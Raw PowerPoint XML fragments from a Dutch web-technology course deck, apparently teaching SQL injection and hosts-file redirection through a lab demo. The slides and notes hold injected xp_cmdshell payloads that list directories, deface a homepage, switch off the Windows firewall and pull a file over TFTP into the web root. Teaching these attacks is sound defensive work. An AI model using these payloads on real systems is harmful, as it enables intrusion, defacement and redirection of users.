            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> c:\xampp\htdocs\OranjeWS &gt; c:\xampp\htdocs\OWS.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> --</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743343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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "echo you are screwed &gt; c:\xampp\htdocs\OranjeWS\homepage.html"--</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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4240009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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2662386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baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Er zijn UDP poorten opengezet hiervoor. Belangrijk is om te weten dat het demonstreren met TFTP het eenvoudigst is. In de praktijk worden er andere scenario's gebruikt.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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2377292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 exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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netsh</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advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> state off" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230333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NB: de DNS cache kan niet rechtstreeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>gehacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> worden. Dit gebeurt via het wijzigen van de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>zgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> host-file. In die file kunnen entries worden geplaatst zodat je naar een andere webserver wordt geleid. Demo op de volgende sheet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>De echte webserver staat in ieder geval buiten spel.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3071788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 exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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tftp</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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 10.0.0.1 GET konfamapes.jpg c:\xampp\htdocs\OranjeWS\konfam.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>--</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2634098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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856755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sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9265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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> opzet van de demo is om te laten zien dat je een gebruiker naar een andere website kunt sturen, zonder dat hij het in de gaten hoeft te hebben. Dat laatste is hier niet echt aan de orde want het valt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>idg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> nogal op dat je naar een andere website gestuurd wordt, maar begrijp het principe.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74388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Openen van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" noProof="0" dirty="0" smtClean="0"/>
              <a:t> als administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> gaar via het menu. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>- klik op de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> toets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>- begin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> te tikken, zodat deze in de lijst verschijnt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>- rechtsklik op </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> en kies "run as administrator" </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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422231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Schrijf het</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t> IP-adres even op. Onthoud dat dit het IP-adres is van marktplaats.</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309970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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125445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21635"/>
            <a:ext cx="12192000" cy="6036365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>afbeelding toevoegen (optioneel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechthoek 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057650" y="2844800"/>
            <a:ext cx="8134351"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6" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057649" y="3420988"/>
            <a:ext cx="776817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4057648" y="3984455"/>
            <a:ext cx="7768172"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76531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688937" y="1096894"/>
            <a:ext cx="813688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3688937" y="2384427"/>
            <a:ext cx="8136880" cy="3952876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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3688939" y="1660355"/>
            <a:ext cx="813688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3688947" y="381573"/>
            <a:ext cx="813687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93534" y="2384427"/>
            <a:ext cx="3277809" cy="3952876"/>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7324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tex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3" y="873238"/>
            <a:ext cx="7725302"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8"/>
            <a:ext cx="7725304" cy="4291614"/>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3" y="1436705"/>
            <a:ext cx="7725304"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8"/>
            <a:ext cx="3495413" cy="4291613"/>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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688938" y="381000"/>
            <a:ext cx="8136879"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INTRODUCTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135374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ory">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6"/>
            <a:ext cx="7725304" cy="4291615"/>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6"/>
            <a:ext cx="3495413" cy="4291615"/>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19285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193526" y="2045685"/>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1/2-kolom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11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6147929" y="2045684"/>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2/2-kolom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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172097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eory large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094921" y="969012"/>
            <a:ext cx="7730895"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355600" y="1762540"/>
            <a:ext cx="11470217" cy="4574762"/>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75818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338667" y="1643270"/>
            <a:ext cx="11487151" cy="4135231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="720000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600" b="1" i="0" baseline="0">
                <a:latin typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>QUOTE GOES HERE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50800" y="1079501"/>
            <a:ext cx="1354667" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="837752"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688936" y="5778500"/>
            <a:ext cx="8136880" cy="558800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr b="1" i="0" baseline="0">
                <a:latin typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>NAME OF QUOTED PERSON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17823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ignm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4" y="866611"/>
            <a:ext cx="7704391"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4" y="2032434"/>
            <a:ext cx="7704393"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6" y="1430078"/>
            <a:ext cx="7704391"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4"/>
            <a:ext cx="3495413" cy="4304867"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6491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rther readin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5" y="866611"/>
            <a:ext cx="7704389"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5" y="2032435"/>
            <a:ext cx="7704392"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7" y="1430078"/>
            <a:ext cx="7704389"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6"/>
            <a:ext cx="3495413" cy="4304866"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117959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ample">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0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>afbeelding toevoegen (optioneel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204866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0" y="1096888"/>
            <a:ext cx="7736419"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4114800" y="2384426"/>
            <a:ext cx="7711016" cy="374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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117085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5" r:id="rId4"/>
    <p:sldLayoutId id="2147483664" r:id="rId5"/>
    <p:sldLayoutId id="2147483665" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
    <p:sldLayoutId id="2147483667" r:id="rId8"/>
    <p:sldLayoutId id="2147483668" r:id="rId9"/>
    <p:sldLayoutId id="2147483676" r:id="rId10"/>
  </p:sldLayoutIdLst>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Web Technologie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Afbeelding 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Afbeelding 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189678" y="5081904"/>
            <a:ext cx="2381250" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tekstvak 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320684" y="5153449"/>
            <a:ext cx="1748413" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Een bijdrage van het profiel......</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechthoek 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057649" y="5081903"/>
            <a:ext cx="4513279" cy="78942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8811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 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Sluit alle browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> die je opent hebt staan (of open bij </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>stap 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>een browser die je nog niet open hebt staan).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Ga terug naar de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> prompt en voer de volgende</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                 commando's uit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een browser en ga naar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.nu.nl</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
